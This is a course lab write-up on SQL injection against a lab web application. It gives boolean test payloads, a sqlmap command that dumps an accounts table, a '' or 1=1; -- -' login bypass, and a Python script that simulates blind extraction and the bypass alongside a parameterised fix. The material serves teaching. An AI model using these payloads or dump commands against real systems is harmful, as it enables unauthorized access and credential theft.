Simple sql


Sqlmap

SQL Injection

Description

In this lab you can practice the SQL Injection techniques and tools studied during the course. You can access the target web application at the following address 10.124.211.96.

Goal

The goal of this lab is to test the web application in order to find all the vulnerable injection points. Once you find them, you should be able to dump all the data and successfully log into the web application.

Tools

The best tools for this lab are:

  • Web browser

  • sqlmap

Steps

Explore the web application

Explore the Web application at the address 10.124.211.96 and find all the possible injection points.

Test and exploit the injection points

By now, you should have found a few injection points. Test them with different techniques (error-based, boolean-based, union-based) to confirm which ones are exploitable.

Dump the data

Now that you know there is at least one exploitable SQL Injection in the target web application, exploit it and dump all the data from the database. You should be able to retrieve some very interesting information that will allow you to log into the web app.

Login without using any credential

Test the login form against SQL injection and use the correct payload to bypass the authentication mechanism.

SOLUTIONS

Please go ahead ONLY if you have COMPLETED the lab or you are stuck! Checking the solutions before actually trying the concepts and techniques you studied in the course will dramatically reduce the benefits of a hands-on lab!

Solutions steps

Explore the web application

In order to explore the web application we just need to type the IP address in our browser:

Now that we are able to access it, let us navigate the application in order to find all the possible injection points.

Right now, we do not know any working credentials, so if we attempt to log in we get a message similar to the following:

If we keep exploring the application, we find a very interesting page at the following address: http://10.124.211.96/news.php.

Here we have a list of news items, and by clicking on any of the links listed we reach another interesting page:

As you can see in the address bar of the browser, the application accepts a parameter (id), which is probably used to retrieve the news item from a database.

Let's then use this injection point for our tests!

Test and exploit the injection points

The first test we can run against the page found in the previous step is the following:

We just added a single quote in the address bar and, as shown in the screenshot above, we obtained a MySQL error. That error means the quote reached the database unescaped, so the parameter is concatenated into a query. It is time to get our hands dirty! Let us create a few payloads in order to test whether the parameter is vulnerable to SQL Injection.

We want to test it against Boolean conditions, so let us use the following payload:

10.124.211.96/newsdetails.php?id=26 and 1=1; -- -

Then let us try with the following payload (we changed the Boolean condition from 1=1 to 1=2):

10.124.211.96/newsdetails.php?id=26 and 1=2; -- -

As we can see from the previous two screenshots, we obtain two different results. When the condition is true, the application returns the news item; when it is false, the page returns no content. The response therefore depends on the truth of a condition we control, which means the parameter is vulnerable to (boolean-based) SQL Injection!

Dump the data

Now that we know a vulnerable injection point, let us use sqlmap to exploit it and retrieve all the data from the application database:


As we can see from the previous screenshot, sqlmap identifies the parameter as vulnerable! Now we just have to get the structure of the database and dump the data. First, let us enumerate the databases and their tables (sqlmap's --dbs and --tables options), which reveals the awd database and its accounts table:

Then dump all the data from the accounts table with the following command (on a Unix shell, quote the URL so the ? and = are passed to sqlmap unchanged):

sqlmap -u http://10.124.211.96/newsdetails.php?id=1 -D awd -T accounts --dump

As we can see, we now have a list of usernames and passwords to use in order to log into the web application! Let us try one of them:

Great, we successfully logged into the web application!

Login without using any credential

Until now, we focused our tests against the newsdetails.php page and its parameter, but the web application has one more injection point to test: the login form!

Let us run some tests and see if we are able to bypass the login! To do this we will use the following payload:

' or 1=1; -- -

As we can see, the form is vulnerable too: the "Welcome!" message appears. The single quote closes the username string literal, or 1=1 makes the WHERE clause true for every row, and -- - comments out the rest of the query, including the password check, so the application logs us in as the first account it finds.
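How the two attacks above actually work, as an added example that is not part of the original lab or its solution: a small Python script with an in-memory SQLite stand-in for the target (the news and accounts rows are invented sample data). It repeats the 1=1/1=2 test, then extracts the admin password one character at a time through the same true/false oracle, which is what sqlmap's boolean-based blind technique automates, and finally shows the login bypass against the vulnerable query and against a parameterised one. The lab target runs MySQL, where the SQLite functions unicode() and substr() become ascii() and substring(); the semicolon in the lab payloads is dropped because the trailing -- - is enough to comment out the rest of the query.

```python
import sqlite3


def build_app():
    """Constructed stand-in for the lab's target: an in-memory SQLite database.
    The news and accounts rows are invented sample data, not the lab's."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE accounts (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO news VALUES (26, 'Lab news item');
        INSERT INTO accounts VALUES (1, 'admin', 'P@ss1');
    """)
    return conn


def newsdetails(conn, id_param):
    """Vulnerable newsdetails.php?id=... handler: the parameter is concatenated
    into the query. Returns the matching rows, or None on a database error
    (the equivalent of the MySQL error the lab triggered with a stray quote)."""
    query = "SELECT title FROM news WHERE id = " + id_param
    try:
        return conn.execute(query).fetchall()
    except sqlite3.Error:
        return None


def page_true(conn, condition):
    """Boolean oracle: does id=26 AND <condition> still return the news item?
    '-- -' comments out whatever follows the injected condition."""
    rows = newsdetails(conn, "26 and " + condition + " -- -")
    return bool(rows)


def detect(conn):
    """The lab's manual test: 1=1 returns the news item, 1=2 returns nothing."""
    return page_true(conn, "1=1") and not page_true(conn, "1=2")


def extract(conn, expression, max_len=64):
    """Recover the value of a scalar SQL expression one character at a time,
    bisecting each code point (0..127, so ASCII data only) through the yes/no
    oracle. This is the boolean-based blind technique sqlmap automates; on
    MySQL the probe would use ascii(substring(...)) instead."""
    value = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if page_true(conn, f"unicode(substr(({expression}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break  # past the end: substr() yields '' and the comparison is never true
        value += chr(lo)
    return value


def login(conn, username, password):
    """Vulnerable login: both fields are concatenated into the WHERE clause.
    Returns the username on success, None otherwise."""
    query = ("SELECT username FROM accounts WHERE username = '" + username
             + "' AND password = '" + password + "'")
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.Error:
        return None
    return row[0] if row else None


def login_safe(conn, username, password):
    """The fix: a parameterised query, so the quote and comment in the payload
    are just characters of the username value, never SQL."""
    row = conn.execute(
        "SELECT username FROM accounts WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = build_app()
    print("boolean injection detected:", detect(conn))
    print("admin password:", extract(conn, "SELECT password FROM accounts WHERE username = 'admin'"))
    print("bypass logs in as:", login(conn, "' or 1=1 -- -", "anything"))
    print("bypass against parameterised login:", login_safe(conn, "' or 1=1 -- -", "anything"))
```

The extract() loop needs about seven requests per character, which is why sqlmap's boolean-based runs are slow compared with an error-based or union-based dump; the oracle also has to be stable, so on a real target compare a fixed marker in the page rather than the whole response.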
